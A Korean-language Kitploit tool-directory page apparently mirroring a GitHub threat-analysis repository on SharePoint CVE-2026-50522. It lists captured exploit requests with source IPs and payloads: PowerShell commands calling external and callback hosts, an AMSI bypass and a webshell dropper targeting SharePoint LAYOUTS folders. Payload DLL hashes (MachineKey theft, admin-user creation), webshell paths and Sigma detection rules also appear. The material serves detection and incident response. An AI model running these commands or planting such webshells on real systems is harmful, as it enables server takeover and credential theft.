Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-50522 — 마이크로소프트 SharePoint CVE-2026-50522 | Kitploit
도구/GitHubGitHub/darses/cve-2026-50522
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRemote Access Tool
GitHubdarses/cve-2026-50522

CVE-2026-50522

마이크로소프트 SharePoint CVE-2026-50522

저장소 보기
31개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-50522

Microsoft SharePoint CVE-2026-50522 페이로드 및 분석.

HTTP 요청

requestsrcuser-agentencodingunique idpayload
81697888245.63.58.216Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'urn:unique-id:securitycontext:b764f8e60e90450b8629b5ce74fccf82powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/b764f8e60e90450b8629b5ce74fccf82'
818198798146.19.216.119Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158'urn:unique-id:securitycontext:2965f1ebb795466c82f01142ca764efaMain.dll
819557248Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"urn:unique-id:securitycontext:8e1a54521f004b19880a4823bcdd3a94ayhmu2nq.dll
819736316165.154.199.52Mozilla/5.0'urn:uid:f7e4a5a8041648ef88f4befd099b1c61eze1fcmh.dll
82202661089.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:77b2293ba0f5464db990f3d2ae402698ActivitySurrogateDisableTypeCheck
82202661689.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:401e5797f3864092a836f92976a6506fedm3ysnc.dll
822486322199.91.221.39Mozilla/5.0 (compatible; SPOOB/1.0)"urn:unique-id:securitycontext:0e5062c6139e48e3bd951e88b3165a48opctzxj4.dll

페이로드

웹셸

탐지

탐지 규칙은 실제 로그로 검증되지 않았습니다.

도구 다운로드
822730890
199.91.221.39
Mozilla/5.0 (compatible; SPMKScan/1.1)
"
urn:unique-id:securitycontext:64ca3f7733c04b8cbcd859e1c08ebb54
ko5ybodq.dll
823155656175.137.255.204Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:6ae69a0ebb7c4b66b7e8cc6f232a7ce3powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://d9k41hj3d47lhf7hbhlg6enhdi7tqb3uk.oast.me/206.255.76.17'
823277752103.151.172.73Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"urn:unique-id:securitycontext:ed252fcd4481466d9f70d3a693a9d073nslookup 9ac2293c.log.dnslog.pp.ua
82345241438.175.103.78Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"urn:unique-id:securitycontext:50fe1b81594845f293362037b3b4b32d`powershell.exe -NoProfile -NonInteractive -Command $ErrorActionPreference='SilentlyContinue';$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if($a){$f=$a.GetField('amsiInitFailed','NonPublic,Static');if($f){$f.SetValue($null,$true)}};$c=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[SNIP ERROR.aspx webshell'));$dirs=@('C:\inetpub\wwwroot\wss\VirtualDirectories','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS');foreach($d in $dirs){if(Test-Path $d){Get-ChildItem $d -Recurse -Directory -ErrorAction SilentlyContinue
824307296190.5.224.135Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:0584ba10642c43e2850bff4122a81514powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JABFAHIAcgBv[SNIP], `$ErrorActionPreference='SilentlyContinue';$ProgressPreference='SilentlyContinue';$webshellB64='[SNIP default_settings.aspx webshell]';$msg='NOPATH';$done=$false;@('16','15')
파일 이름파일 해시 SHA-256생성 시간 (UTC)비고
14e2gtsh.dll8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d2026-07-24 03:00:13MachineKeys 반환
ayhmu2nq.dlledb087336f22a152d9023416b60ee74db2d30e5df52f2166f5dd1b4ae70aa2eb2026-07-24 01:47:55CompatibilityHttpsListener로 WinRM 활성화, 사용자 sp_admin 추가 및 로컬 관리자 그룹에 추가
b4tg4ktk.dll824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b99662026-07-23 07:53:59MachineKeys 및 상태 코드 200 반환
bwd0vdqa.dllafce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb352026-07-23 02:54:54MachineKeys 반환
edm3ysnc.dll91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb705492026-07-22 10:54:43MachineKeys 반환
eze1fcmh.dll02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd2026-07-24 02:37:59웹셸/백도어 cmRANDOM.aspx 작성
hyyavam5.dll74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f2026-07-26 03:20:01
jflyahz3.dll352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be94591512026-07-23 07:15:43MachineKeys 반환
ko5ybodq.dll249fea110682ff603bf24f9c1147eae73642b186c7a23022d5f824498b8fcd662026-07-27 14:41:06
Main.dll7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec952055-02-11 11:16:12MachineKeys 반환. 이전 ToolShell 캠페인에서 사용된 페이로드.
obdw11tn.dll2ed05c2ff5977047a5aa779510983f7f27b1fde8a0ce6ac8611341eea55f9e372025-07-29 08:50:39MachineKeys 반환
opctzxj4.dllf5c8c39b29d061d72eaefcf1ff19511bdab5d4b3c9849df4ead07dbe61364ee22026-07-27 15:32:46
tyt0qmyy.dll46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d72026-07-20 08:55:23HTTP 응답 헤더 sec-ch-ua-mobile: ?1 반환
z1zkfu55.dllab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da0122026-07-26 04:49:55
gzlzbkhj.dll52f4af0401258daa9a278710145a9d0d67a35147f0ea136b88684362953489332026-07-25 14:08:17
qho14tqo.dll814db355b4a03fbd6fa138b37a04dd5ff24d9bc5d15e24474f149b220e9c60782026-07-23 06:58:36
파일 이름파일 해시 SHA-256비고
cmRANDOM.aspx450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511웹셸 "Helper Tool" 및 파일 이름 cm{RANDOM}.aspx. 실행된 페이로드는 Assembly.Load(assemblyBytes)를 사용하여 메모리 내에서 실행됩니다. 파일 이름은 무작위로 생성됩니다.
default_settings.aspxf72a4d95b4c49bb9ffac869d2a30d829f2519d2f6a1a86bcea54dbeffc34f550웹셸 위치 TEMPLATE\LAYOUTS 또는 \wss\VirtualDirectories\
error.aspx291dc1f15143c2c87fd2257b6145069914bdffa2f6be9afa63169f8661d9cc4b웹셸 위치 C:\inetpub\wwwroot\wss\VirtualDirectories, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS.
layout2sp.aspxd7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597웹셸 위치 \TEMPLATE\LAYOUTS\layout2sp.aspx.
유형규칙비고
SigmaDNS Query to External Service Interaction Domains.log.dnslog.pp.ua, .oast.me, .oastify.com과 같은 콜백 도메인에 대한 외부 DNS 쿼리를 탐지합니다.
SigmaNew User Created Via Net.EXEnet.exe를 사용하여 추가된 새 사용자를 탐지합니다.
SigmaPotential WMI Lateral Movement WmiPrvSE Spawned PowerShellWMI를 통한 측면 이동을 탐지합니다.
SigmaSuspicious File Write to SharePoint Layouts DirectorySharePoint 폴더 \TEMPLATE\LAYOUTS\에 대한 파일 쓰기를 탐지합니다.
SigmaSuspicious PowerShell Parent Processw3wp.exe에 의한 powershell.exe 프로세스 생성을 탐지합니다.
SigmaSuspicious Process By Web Server Processw3wp.exe에서 생성된 의심스러운 프로세스를 탐지합니다.
SigmaSuspicious Processes Spawned by WinRMWinRM 호스트 프로세스에서 생성된 셸을 포함한 의심스러운 프로세스를 탐지합니다.
SigmaWebshell Detection With Command Line Keywords웹 셸을 통한 정찰 활동 중 자주 사용되는 특정 명령줄 매개변수를 탐지합니다.
SigmaWebshell Hacking Activity Patternsw3wp.exe의 특정 하위 프로세스를 탐지합니다.